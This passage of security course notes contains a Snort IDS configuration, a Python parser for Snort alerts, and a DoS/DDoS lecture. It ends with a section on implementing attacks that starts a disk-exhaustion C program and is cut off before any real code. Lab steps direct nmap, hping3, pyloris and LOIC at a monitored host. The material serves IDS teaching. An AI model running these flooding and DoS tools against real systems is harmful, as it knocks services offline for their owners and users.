preprocessor normalize_ip4

preprocessor normalize_tcp: ips ecn stream

preprocessor normalize_icmp4

preprocessor normalize_ip6

preprocessor normalize_icmp6

 

# Target-based IP defragmentation.  For more information, see README.frag3

preprocessor frag3_global: max_frags 65536

preprocessor frag3_engine: policy windows detect_anomalies overlap_limit 10 min_fragment_length 100 timeout 180

 

# Target-Based stateful inspection/stream reassembly.  For more information, see README.stream5

preprocessor stream5_global: track_tcp yes, \

   track_udp yes, \

   track_icmp no, \

   max_tcp 262144, \

   max_udp 131072, \

   max_active_responses 2, \

   min_response_seconds 5

preprocessor stream5_tcp: policy windows, detect_anomalies, require_3whs 180, \

   overlap_limit 10, small_segments 3 bytes 150, timeout 180, \

    ports client 21 22 23 25 42 53 70 79 109 110 111 113 119 135 136 137 139 143 \

        161 445 513 514 587 593 691 1433 1521 1741 2100 3306 6070 6665 6666 6667 6668 6669 \

        7000 8181 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779, \

    ports both 36 80 81 82 83 84 85 86 87 88 89 90 110 311 383 443 465 563 555 591 593 631 636 801 808 818 901 972 989 992 993 994 995 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7907 7000 7001 7071 7144 7145 7510 7802 7770 7777 7778 7779 \

        7801 7900 7901 7902 7903 7904 7905 7906 7908 7909 7910 7911 7912 7913 7914 7915 7916 \

        7917 7918 7919 7920 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712

preprocessor stream5_udp: timeout 180

 

# performance statistics.  For more information, see the Snort Manual, Configuring Snort - Preprocessors - Performance Monitor

# preprocessor perfmonitor: time 300 file /var/snort/snort.stats pktcnt 10000

 

# HTTP normalization and anomaly detection.  For more information, see README.http_inspect

preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 65535 decompress_depth 65535

preprocessor http_inspect_server: server default \

    http_methods { GET POST PUT SEARCH MKCOL COPY MOVE LOCK UNLOCK NOTIFY POLL BCOPY BDELETE BMOVE LINK UNLINK OPTIONS HEAD DELETE TRACE TRACK CONNECT SOURCE SUBSCRIBE UNSUBSCRIBE PROPFIND PROPPATCH BPROPFIND BPROPPATCH RPC_CONNECT PROXY_SUCCESS BITS_POST CCM_POST SMS_POST RPC_IN_DATA RPC_OUT_DATA RPC_ECHO_DATA } \

    chunk_length 500000 \

    server_flow_depth 0 \

    client_flow_depth 0 \

    post_depth 65495 \

    oversize_dir_length 500 \

    max_header_length 750 \

    max_headers 100 \

    max_spaces 200 \

    small_chunk_length { 10 5 } \

    ports { 36 80 81 82 83 84 85 86 87 88 89 90 311 383 555 591 593 631 801 808 818 901 972 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7000 7001 7071 7144 7145 7510 7770 7777 7778 7779 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712 } \

    non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \

    enable_cookie \

    extended_response_inspection \

    inspect_gzip \

    normalize_utf \

    unlimited_decompress \

    normalize_javascript \

    apache_whitespace no \

    ascii no \

    bare_byte no \

    directory no \

    double_decode no \

    iis_backslash no \

    iis_delimiter no \

    iis_unicode no \

    multi_slash no \

    utf_8 no \

    u_encode yes \

    webroot no

 

# ONC-RPC normalization and anomaly detection.  For more information, see the Snort Manual, Configuring Snort - Preprocessors - RPC Decode

preprocessor rpc_decode: 111 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 no_alert_multiple_requests no_alert_large_fragments no_alert_incomplete

 

# Back Orifice detection.

preprocessor bo

 

# FTP / Telnet normalization and anomaly detection.  For more information, see README.ftptelnet

preprocessor ftp_telnet: global inspection_type stateful encrypted_traffic no check_encrypted

preprocessor ftp_telnet_protocol: telnet \

    ayt_attack_thresh 20 \

    normalize ports { 23 } \

    detect_anomalies

preprocessor ftp_telnet_protocol: ftp server default \

    def_max_param_len 100 \

    ports { 21 2100 3535 } \

    telnet_cmds yes \

    ignore_telnet_erase_cmds yes \

    ftp_cmds { ABOR ACCT ADAT ALLO APPE AUTH CCC CDUP } \

    ftp_cmds { CEL CLNT CMD CONF CWD DELE ENC EPRT } \

    ftp_cmds { EPSV ESTA ESTP FEAT HELP LANG LIST LPRT } \

    ftp_cmds { LPSV MACB MAIL MDTM MIC MKD MLSD MLST } \

    ftp_cmds { MODE NLST NOOP OPTS PASS PASV PBSZ PORT } \

    ftp_cmds { PROT PWD QUIT REIN REST RETR RMD RNFR } \

    ftp_cmds { RNTO SDUP SITE SIZE SMNT STAT STOR STOU } \

    ftp_cmds { STRU SYST TEST TYPE USER XCUP XCRC XCWD } \

    ftp_cmds { XMAS XMD5 XMKD XPWD XRCP XRMD XRSQ XSEM } \

    ftp_cmds { XSEN XSHA1 XSHA256 } \

    alt_max_param_len 0 { ABOR CCC CDUP ESTA FEAT LPSV NOOP PASV PWD QUIT REIN STOU SYST XCUP XPWD } \

    alt_max_param_len 200 { ALLO APPE CMD HELP NLST RETR RNFR STOR STOU XMKD } \

    alt_max_param_len 256 { CWD RNTO } \

    alt_max_param_len 400 { PORT } \

    alt_max_param_len 512 { SIZE } \

    chk_str_fmt { ACCT ADAT ALLO APPE AUTH CEL CLNT CMD } \

    chk_str_fmt { CONF CWD DELE ENC EPRT EPSV ESTP HELP } \

    chk_str_fmt { LANG LIST LPRT MACB MAIL MDTM MIC MKD } \

    chk_str_fmt { MLSD MLST MODE NLST OPTS PASS PBSZ PORT } \

    chk_str_fmt { PROT REST RETR RMD RNFR RNTO SDUP SITE } \

    chk_str_fmt { SIZE SMNT STAT STOR STRU TEST TYPE USER } \

    chk_str_fmt { XCRC XCWD XMAS XMD5 XMKD XRCP XRMD XRSQ } \

    chk_str_fmt { XSEM XSEN XSHA1 XSHA256 } \

    cmd_validity ALLO < int [ char R int ] > \

    cmd_validity EPSV < [ { char 12 | char A char L char L } ] > \

    cmd_validity MACB < string > \

    cmd_validity MDTM < [ date nnnnnnnnnnnnnn[.n[n[n]]] ] string > \

    cmd_validity MODE < char ASBCZ > \

    cmd_validity PORT < host_port > \

    cmd_validity PROT < char CSEP > \

    cmd_validity STRU < char FRPO [ string ] > \

    cmd_validity TYPE < { char AE [ char NTC ] | char I | char L [ number ] } >

preprocessor ftp_telnet_protocol: ftp client default \

    max_resp_len 256 \

    bounce yes \

    ignore_telnet_erase_cmds yes \

    telnet_cmds yes

 

 

# SMTP normalization and anomaly detection.  For more information, see README.SMTP

preprocessor smtp: ports { 25 465 587 691 } \

    inspection_type stateful \

    b64_decode_depth 0 \

    qp_decode_depth 0 \

    bitenc_decode_depth 0 \

    uu_decode_depth 0 \

    log_mailfrom \

    log_rcptto \

    log_filename \

    log_email_hdrs \

    normalize cmds \

    normalize_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

    normalize_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

    normalize_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

    normalize_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    max_command_line_len 512 \

    max_header_line_len 1000 \

    max_response_line_len 512 \

    alt_max_command_line_len 260 { MAIL } \

    alt_max_command_line_len 300 { RCPT } \

    alt_max_command_line_len 500 { HELP HELO ETRN EHLO } \

    alt_max_command_line_len 255 { EXPN VRFY ATRN SIZE BDAT DEBUG EMAL ESAM ESND ESOM EVFY IDENT NOOP RSET } \

    alt_max_command_line_len 246 { SEND SAML SOML AUTH TURN ETRN DATA RSET QUIT ONEX QUEU STARTTLS TICK TIME TURNME VERB X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    valid_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

    valid_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

    valid_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

    valid_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    xlink2state { enabled }

 

# Portscan detection.  For more information, see README.sfportscan

# preprocessor sfportscan: proto  { all } memcap { 10000000 } sense_level { low }

 

# ARP spoof detection.  For more information, see the Snort Manual - Configuring Snort - Preprocessors - ARP Spoof Preprocessor

# preprocessor arpspoof

# preprocessor arpspoof_detect_host: 192.168.40.1 f0:0f:00:f0:0f:00

 

# SSH anomaly detection.  For more information, see README.ssh

preprocessor ssh: server_ports { 22 } \

                  autodetect \

                  max_client_bytes 19600 \

                  max_encrypted_packets 20 \

                  max_server_version_len 100 \

                  enable_respoverflow enable_ssh1crc32 \

                  enable_srvoverflow enable_protomismatch

 

# SMB / DCE-RPC normalization and anomaly detection.  For more information, see README.dcerpc2

preprocessor dcerpc2: memcap 102400, events [co ]

preprocessor dcerpc2_server: default, policy WinXP, \

    detect [smb [139,445], tcp 135, udp 135, rpc-over-http-server 593], \

    autodetect [tcp 1025:, udp 1025:, rpc-over-http-server 1025:], \

    smb_max_chain 3, smb_invalid_shares ["C$", "D$", "ADMIN$"]

 

# DNS anomaly detection.  For more information, see README.dns

preprocessor dns: ports { 53 } enable_rdata_overflow

 

# SSL anomaly detection and traffic bypass.  For more information, see README.ssl

preprocessor ssl: ports { 443 465 563 636 989 992 993 994 995 5061 7801 7802 7900 7901 7902 7903 7904 7905 7906 7907 7908 7909 7910 7911 7912 7913 7914 7915 7916 7917 7918 7919 7920 }, trustservers, noinspect_encrypted

 

# SDF sensitive data preprocessor.  For more information see README.sensitive_data

preprocessor sensitive_data: alert_threshold 25

 

# SIP Session Initiation Protocol preprocessor.  For more information see README.sip

preprocessor sip: max_sessions 40000, \

   ports { 5060 5061 5600 }, \

   methods { invite \

             cancel \

             ack \

             bye \

             register \

             options \

             refer \

             subscribe \

             update \

             join \

             info \

             message \

             notify \

             benotify \

             do \

             qauth \

             sprack \

             publish \

             service \

             unsubscribe \

             prack }, \

   max_uri_len 512, \

   max_call_id_len 80, \

   max_requestName_len 20, \

   max_from_len 256, \

   max_to_len 256, \

   max_via_len 1024, \

   max_contact_len 512, \

   max_content_len 2048

 

# IMAP preprocessor.  For more information see README.imap

preprocessor imap: \

   ports { 143 } \

   b64_decode_depth 0 \

   qp_decode_depth 0 \

   bitenc_decode_depth 0 \

   uu_decode_depth 0

 

# POP preprocessor. For more information see README.pop

preprocessor pop: \

   ports { 110 } \

   b64_decode_depth 0 \

   qp_decode_depth 0 \

   bitenc_decode_depth 0 \

   uu_decode_depth 0

 

# Modbus preprocessor. For more information see README.modbus

preprocessor modbus: ports { 502 }

 

# DNP3 preprocessor. For more information see README.dnp3

preprocessor dnp3: ports { 20000 } \

   memcap 262144 \

   check_crc

 

# Reputation preprocessor. For more information see README.reputation

preprocessor reputation: \

   memcap 500, \

   priority whitelist, \

   nested_ip inner, \

   whitelist $WHITE_LIST_PATH/white_list.rules, \

   blacklist $BLACK_LIST_PATH/black_list.rules

 

###################################################

# Step #6: Configure output plugins

# For more information, see Snort Manual, Configuring Snort - Output Modules

###################################################

 

# unified2

# Recommended for most installs

# output unified2: filename merged.log, limit 128, nostamp, mpls_event_types, vlan_event_types

 

# Additional configuration for specific types of installs

# output alert_unified2: filename snort.alert, limit 128, nostamp

# output log_unified2: filename snort.log, limit 128, nostamp

 

# syslog

# output alert_syslog: LOG_AUTH LOG_ALERT

 

# pcap

# output log_tcpdump: tcpdump.log

 

# metadata reference data.  do not modify these lines

include classification.config

include reference.config

 

 

###################################################

# Step #7: Customize your rule set

# For more information, see Snort Manual, Writing Snort Rules

#

# NOTE: All categories are enabled in this conf file

###################################################

 

# site specific rules

include $RULE_PATH/local.rules

 

include $RULE_PATH/file-identify.rules

include $RULE_PATH/app-detect.rules

include $RULE_PATH/attack-responses.rules

include $RULE_PATH/backdoor.rules

include $RULE_PATH/bad-traffic.rules

include $RULE_PATH/blacklist.rules

include $RULE_PATH/botnet-cnc.rules

include $RULE_PATH/browser-chrome.rules

include $RULE_PATH/browser-firefox.rules

include $RULE_PATH/browser-ie.rules

include $RULE_PATH/browser-other.rules

include $RULE_PATH/browser-plugins.rules

include $RULE_PATH/browser-webkit.rules

include $RULE_PATH/chat.rules

include $RULE_PATH/content-replace.rules

include $RULE_PATH/ddos.rules

include $RULE_PATH/dns.rules

include $RULE_PATH/dos.rules

include $RULE_PATH/experimental.rules

include $RULE_PATH/exploit-kit.rules

include $RULE_PATH/exploit.rules

include $RULE_PATH/file-executable.rules

include $RULE_PATH/file-flash.rules

include $RULE_PATH/file-image.rules

include $RULE_PATH/file-java.rules

include $RULE_PATH/file-multimedia.rules

include $RULE_PATH/file-office.rules

include $RULE_PATH/file-other.rules

include $RULE_PATH/file-pdf.rules

include $RULE_PATH/finger.rules

include $RULE_PATH/ftp.rules

include $RULE_PATH/icmp-info.rules

include $RULE_PATH/icmp.rules

include $RULE_PATH/imap.rules

include $RULE_PATH/indicator-compromise.rules

include $RULE_PATH/indicator-obfuscation.rules

include $RULE_PATH/indicator-scan.rules

include $RULE_PATH/indicator-shellcode.rules

include $RULE_PATH/info.rules

include $RULE_PATH/malware-backdoor.rules

include $RULE_PATH/malware-cnc.rules

include $RULE_PATH/malware-other.rules

include $RULE_PATH/malware-tools.rules

include $RULE_PATH/misc.rules

include $RULE_PATH/multimedia.rules

include $RULE_PATH/mysql.rules

include $RULE_PATH/netbios.rules

include $RULE_PATH/nntp.rules

include $RULE_PATH/oracle.rules

include $RULE_PATH/os-linux.rules

include $RULE_PATH/os-mobile.rules

include $RULE_PATH/os-other.rules

include $RULE_PATH/os-solaris.rules

include $RULE_PATH/os-windows.rules

include $RULE_PATH/other-ids.rules

include $RULE_PATH/p2p.rules

include $RULE_PATH/phishing-spam.rules

include $RULE_PATH/policy-multimedia.rules

include $RULE_PATH/policy-other.rules

include $RULE_PATH/policy.rules

include $RULE_PATH/policy-social.rules

include $RULE_PATH/policy-spam.rules

include $RULE_PATH/pop2.rules

include $RULE_PATH/pop3.rules

include $RULE_PATH/protocol-dns.rules

include $RULE_PATH/protocol-finger.rules

include $RULE_PATH/protocol-ftp.rules

include $RULE_PATH/protocol-icmp.rules

include $RULE_PATH/protocol-imap.rules

include $RULE_PATH/protocol-nntp.rules

include $RULE_PATH/protocol-other.rules

include $RULE_PATH/protocol-pop.rules

include $RULE_PATH/protocol-rpc.rules

include $RULE_PATH/protocol-scada.rules

include $RULE_PATH/protocol-services.rules

include $RULE_PATH/protocol-snmp.rules

include $RULE_PATH/protocol-telnet.rules

include $RULE_PATH/protocol-tftp.rules

include $RULE_PATH/protocol-voip.rules

include $RULE_PATH/pua-adware.rules

include $RULE_PATH/pua-other.rules

include $RULE_PATH/pua-p2p.rules

include $RULE_PATH/pua-toolbars.rules

include $RULE_PATH/rpc.rules

include $RULE_PATH/rservices.rules

include $RULE_PATH/scada.rules

include $RULE_PATH/scan.rules

include $RULE_PATH/server-apache.rules

include $RULE_PATH/server-iis.rules

include $RULE_PATH/server-mail.rules

include $RULE_PATH/server-mssql.rules

include $RULE_PATH/server-mysql.rules

include $RULE_PATH/server-oracle.rules

include $RULE_PATH/server-other.rules

include $RULE_PATH/server-samba.rules

include $RULE_PATH/server-webapp.rules

include $RULE_PATH/shellcode.rules

include $RULE_PATH/smtp.rules

include $RULE_PATH/snmp.rules

include $RULE_PATH/specific-threats.rules

include $RULE_PATH/spyware-put.rules

include $RULE_PATH/sql.rules

include $RULE_PATH/telnet.rules

include $RULE_PATH/tftp.rules

include $RULE_PATH/virus.rules

include $RULE_PATH/voip.rules

include $RULE_PATH/web-activex.rules

include $RULE_PATH/web-attacks.rules

include $RULE_PATH/web-cgi.rules

include $RULE_PATH/web-client.rules

include $RULE_PATH/web-coldfusion.rules

include $RULE_PATH/web-frontpage.rules

include $RULE_PATH/web-iis.rules

include $RULE_PATH/web-misc.rules

include $RULE_PATH/web-php.rules

include $RULE_PATH/x11.rules

 

###################################################

# Step #8: Customize your preprocessor and decoder alerts

# For more information, see README.decoder_preproc_rules

###################################################

 

# decoder and preprocessor event rules

# include $PREPROC_RULE_PATH/preprocessor.rules

# include $PREPROC_RULE_PATH/decoder.rules

# include $PREPROC_RULE_PATH/sensitive-data.rules

 

###################################################

# Step #9: Customize your Shared Object Snort Rules

# For more information, see

# http://vrt-blog.snort.org/2009/01/using-vrt-certified-shared-object-rules.html

###################################################

 

# dynamic library rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/browser-other.rules

# include $SO_RULE_PATH/browser-plugins.rules

# include $SO_RULE_PATH/exploit-kit.rules

# include $SO_RULE_PATH/file-executable.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/file-image.rules

# include $SO_RULE_PATH/file-java.rules

# include $SO_RULE_PATH/file-multimedia.rules

# include $SO_RULE_PATH/file-office.rules

# include $SO_RULE_PATH/file-other.rules

# include $SO_RULE_PATH/file-pdf.rules

# include $SO_RULE_PATH/indicator-shellcode.rules

# include $SO_RULE_PATH/malware-cnc.rules

# include $SO_RULE_PATH/malware-other.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/os-linux.rules

# include $SO_RULE_PATH/os-other.rules

# include $SO_RULE_PATH/os-windows.rules

# include $SO_RULE_PATH/policy-social.rules

# include $SO_RULE_PATH/protocol-dns.rules

# include $SO_RULE_PATH/protocol-icmp.rules

# include $SO_RULE_PATH/protocol-nntp.rules

# include $SO_RULE_PATH/protocol-other.rules

# include $SO_RULE_PATH/protocol-snmp.rules

# include $SO_RULE_PATH/protocol-voip.rules

# include $SO_RULE_PATH/pua-p2p.rules

# include $SO_RULE_PATH/server-apache.rules

# include $SO_RULE_PATH/server-iis.rules

# include $SO_RULE_PATH/server-mail.rules

# include $SO_RULE_PATH/server-mysql.rules

# include $SO_RULE_PATH/server-oracle.rules

# include $SO_RULE_PATH/server-other.rules

# include $SO_RULE_PATH/server-webapp.rules

 

# legacy dynamic library rule files

# include $SO_RULE_PATH/bad-traffic.rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/chat.rules

# include $SO_RULE_PATH/dos.rules

# include $SO_RULE_PATH/exploit.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/icmp.rules

# include $SO_RULE_PATH/imap.rules

# include $SO_RULE_PATH/misc.rules

# include $SO_RULE_PATH/multimedia.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/nntp.rules

# include $SO_RULE_PATH/p2p.rules

# include $SO_RULE_PATH/smtp.rules

# include $SO_RULE_PATH/snmp.rules

# include $SO_RULE_PATH/specific-threats.rules

# include $SO_RULE_PATH/web-activex.rules

# include $SO_RULE_PATH/web-client.rules

# include $SO_RULE_PATH/web-iis.rules

# include $SO_RULE_PATH/web-misc.rules

 

# Event thresholding or suppression commands. See threshold.conf

include threshold.conf





[Note] Snort topics that still need study


The following need separate study:

Snort rule generation => tools

Snort (IDS) + prevention => IPS (Snort run inline, dropping instead of only alerting)

Snort -> DB -> web front end => tools

■ Reference videos (please watch these)


Snort - NIDS on CentOS 6.5 - part 1/4

http://www.youtube.com/watch?v=DYBfCyd6cC0


Snort - NIDS on CentOS 6.5 - part 2/4

http://www.youtube.com/watch?v=frmZWsjPBZ8


Snort - NIDS on CentOS 6.5 - part 3/4

http://www.youtube.com/watch?v=QBwwhIBav38


Snort - NIDS on CentOS 6.5 - part 4/4

http://www.youtube.com/watch?v=II80tzwEuFk



■ Snort Rule Generator


YouTube video on how to use the Snort Rule Generator
http://www.youtube.com/watch?v=4Eb8S-NK6f4

Program download
http://dl.dropbox.com/u/4864067/snort-rules.zip

Snort Rule Generator usage



Carry out the following labs individually and write up an analysis report.


[Lab 1] Checking Snort detection of scanning

- Run nmap and confirm the result on the Snort side


[Lab 2] Checking Snort detection of a flooding attack

- Run hping3 and confirm the result on the Snort side


[Lab 3] Checking Snort detection of a DoS attack

- Run pyloris 3.2 and confirm the result on the Snort side

- Attack with the LOIC tool and confirm the result on the Snort side
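To check the Snort side of the three labs without reading alert files by eye, the following Python script parses Snort's alert_fast output (what `-A fast` or `output alert_fast` writes) and tallies alerts per source and signature, keeping the set of destination ports each source touched so a port scan can be told apart from a flood. It is an added example, not part of the course material or of Snort itself; the alert lines inside it are constructed to look like alert_fast output, and the rule messages (LOCAL nmap SYN scan and so on) are assumed names for rules you would write in local.rules.

```python
"""Parse Snort alert_fast lines and summarise which sources trip which
signatures.  Added example for the Snort labs; the alert lines below are
constructed, not captured from a real run."""
import re
from collections import Counter, defaultdict

# One alert_fast line: timestamp, [gid:sid:rev], message, optional
# classification, priority, {protocol}, src[:port] -> dst[:port].
# Ports are absent for ICMP alerts.
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s+(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed sample: an nmap scan, an hping3 ICMP flood and a GET flood,
# plus one junk line that a parser must skip.
SAMPLE_ALERTS = """\
08/23-14:05:12.101010  [**] [1:1000001:1] LOCAL nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.20.50:44321 -> 192.168.20.200:22
08/23-14:05:12.101212  [**] [1:1000001:1] LOCAL nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.20.50:44321 -> 192.168.20.200:80
08/23-14:05:12.101414  [**] [1:1000001:1] LOCAL nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.20.50:44321 -> 192.168.20.200:443
08/23-14:06:01.500000  [**] [1:1000002:1] LOCAL hping3 ICMP flood [**] [Classification: Attempted Denial of Service] [Priority: 2] {ICMP} 192.168.20.51 -> 192.168.20.200
08/23-14:06:01.500100  [**] [1:1000002:1] LOCAL hping3 ICMP flood [**] [Classification: Attempted Denial of Service] [Priority: 2] {ICMP} 192.168.20.51 -> 192.168.20.200
08/23-14:07:30.000000  [**] [1:1000003:2] LOCAL HTTP GET flood [**] [Priority: 3] {TCP} 192.168.20.52:51000 -> 192.168.20.200:80
this line is not an alert and must be skipped
"""


def parse_alerts(text):
    """Return a list of dicts (regex groups), one per well-formed alert line."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            alerts.append(m.groupdict())
    return alerts


def summarise(alerts):
    """Map (src, sid, msg) -> count, and src -> set of destination ports.
    Many distinct ports from one source is a scan; many alerts on one
    port is a flood."""
    counts = Counter()
    ports = defaultdict(set)
    for a in alerts:
        counts[(a["src"], a["sid"], a["msg"])] += 1
        if a["dport"]:
            ports[a["src"]].add(int(a["dport"]))
    return counts, ports


def noisy_sources(alerts, min_alerts=2):
    """Sources that produced at least min_alerts alerts, most active first."""
    per_src = Counter(a["src"] for a in alerts)
    return [src for src, n in per_src.most_common() if n >= min_alerts]


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    counts, ports = summarise(parsed)
    for (src, sid, msg), n in counts.most_common():
        print(f"{src:16} sid={sid:8} x{n:<3} {msg}  ports={sorted(ports.get(src, []))}")
    print("noisy sources:", noisy_sources(parsed))
```

Feed it the real file with `parse_alerts(open("/var/log/snort/alert").read())`; the same regex works on the console output of `snort -A console`.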












                DoS(Denial of Service) & DDoS(Distributed DoS)





        ■ Security-issue vocabulary

        DoS/DDoS, DB attack, APT attack, spam mail, web hacking, wireless hacking

        + big data security + IoT security


        ■ Recap of the layers covered so far

        DoS/DDoS ---> Firewall ---> IPS/IDS ---> WAF ---> Web server (SELinux)




1. DoS and DDoS terminology


DoS (Denial of Service) attack (1:1)

A denial-of-service attack is any sequence of actions by which an attacker disables a host's hardware or software so that the host refuses service requests from legitimate users.


DDoS (Distributed Denial of Service) attack (N:1)

A distributed denial-of-service attack is a DoS attack on a single target system carried out from many computers in a networked, distributed environment (e.g. a botnet).




2. Characteristics of DoS attacks


The goal is not to obtain administrator privileges (e.g. root).

The goal is not to destroy, tamper with or steal data.

The cause of the attack and the attacker are hard to trace.

It is hard to deal with while the attack is in progress.

A very wide range of attack methods is possible.

The same attack can produce different results on different systems.

It can be used as a preliminary step for another attack.

It can be caused by user error.

It has turned into a form of crime in which money is demanded (ransom DDoS).




3. Types of DoS attack


(1) Internal (local) attacks


Form of attack

The system is paralysed by occupying or exhausting the resources it holds.

Caused by an internal user who has an account (e.g. a malicious user with a local account).

More often caused by mistake than by intent (e.g. by a developer).


Kinds of attack

Filling the disk (e.g. disk full)

Memory exhaustion (e.g. memory leak)

Process creation (e.g. creating a very large number of processes)





(2) External (remote) attacks


Form of attack

Paralysing the service on a particular port (e.g. a service denial attack)

Making the network function itself misbehave


Kinds of attack

Application level
- Mail bomb
- Buffer overflow
- Java applet attack

Protocol level
- SYN flooding
- Ping flooding
- Smurf attack

Network level
- UDP storm
- Network bandwidth attack




4. DDoS attack types by traffic composition


Rank | Protocol        | Attack type                | Share
-----+-----------------+----------------------------+------
1    | UDP             | Malicious IRC bot flooding | 70%
     |                 | Source spoofing            | 5%
2    | ICMP            | Fragmentation attack       | 10%
3    | Garbage packet  | Opentear, fragment         | 7%
4    | Service attack  | GET/POST DDoS attack       | 8%

-> UDP-borne malicious IRC bot flooding makes up the bulk of DDoS traffic; UDP alone accounts for roughly 75% of all DDoS (70% bot flooding plus 5% source-spoofed traffic).


■ Attack classification by target

                      | Connection volume increase                                                            | Large-volume traffic
Category              | PPS consuming              | Connection consuming     | Application consuming         | Bandwidth/infra consuming
----------------------+----------------------------+--------------------------+-------------------------------+-----------------------------
Protocol              | TCP (no handshake)         | TCP (handshake)          | HTTP, DNS, VoIP, DHCP         | UDP/ICMP
Attacking PC location | domestic / foreign         | domestic / foreign       | domestic / foreign            | domestic
IP spoofed?           | spoofed or real IP         | real IP (zombie)         | real IP (zombie)              | spoofed or real IP
Attack pattern        | packets of 64 bytes or     | 64-byte packets,         | HTTP cache-control,           | 1000-1500-byte packets,
                      | less, hundreds of          | hundreds of thousands    | DNS query flooding, etc.      | hundreds of thousands of PPS
                      | thousands to millions PPS  | to millions of PPS       |                               |
Effect                | load on network devices,   | web server connection    | server connection exhaustion  | line bandwidth exceeded
                      | security devices, servers  | exhaustion               |                               |
Victim systems        | target system, or every    | target server            | application                   | every system on the same
                      | system on the same network |                          |                               | network





■ Server-based DDoS attacks

(Past)

Connection exhaustion (L7 attack) => server / application

Application-layer attacks
- Attacks on one specific application layer, such as HTTP request flooding, CC attack and VoIP, that deny service to legitimate users
- Only the targeted application is affected; other systems on the same network stay normal
- Attack traffic volume is very small, and other application layers keep working

(Present)

Connection exhaustion (L7 attack) + bandwidth exhaustion (L4 attack) => network / application / infrastructure

Application/infrastructure-layer attacks
- HTTP request bomb, DDoS evasion attack
- Application-layer attack with abnormal data fields added
- Completes a normal handshake from a real IP first, then floods
- Attack traffic volume is very large and takes down the whole infrastructure
- A single flow rather than multiple flows (mixed attack) is used to increase the effect


■ Bandwidth (network line) based DDoS attacks

(Past)

Bandwidth exhaustion (L3/L4 attack) => network / infrastructure

L3/L4-layer attacks
- UDP/ICMP flooding
- Attacks the network/infrastructure so that every external request is blocked or delayed
- The target service is affected, and so are the other systems on the same network
- Attack traffic volume is very large and communication fails at every layer

(Present)

Traffic that mimics real traffic (L3/L4 attack) + bandwidth exhaustion => network / application / infrastructure
- Real dump attack, DDoS evasion attack
- Has shifted to UDP and ICMP fragmentation attacks
- For VoIP, sends large volumes of packets indistinguishable from real ones
- For DNS, sends normal-looking queries
- Attacks are shifting from L3/L4 to the application layer




5. Technical analysis of attack methods


■ UDP DDoS attack sample

-> 1000 bytes of data per packet


■ ICMP DDoS attack sample

-> 1480 bytes of data per packet


■ SYN flood DDoS attack sample

-> header only, no payload


■ No-cache GET flood DDoS attack sample

-> header only (HTTP GET carrying Cache-Control: no-cache, so every request is passed through any cache to the origin server)


■ Data + ACK flooding DDoS attack sample

-> data only, no handshake

        Source IP/port = random

        Destination IP/port = fixed

        Data = inserted (1460 bytes)

■ Connection + SYN flooding DDoS attack sample

-> header only

        No-cache GET flood

        SYN flooding








6. 공격 방법 구현 실습


■ Local attack (system resource exhaustion)

Technique: disk exhaustion

Principle
- Create an arbitrary file and keep growing it, filling the disk with useless data

Attack code and how to run it

# vi disk_attack.c

#include <fcntl.h>
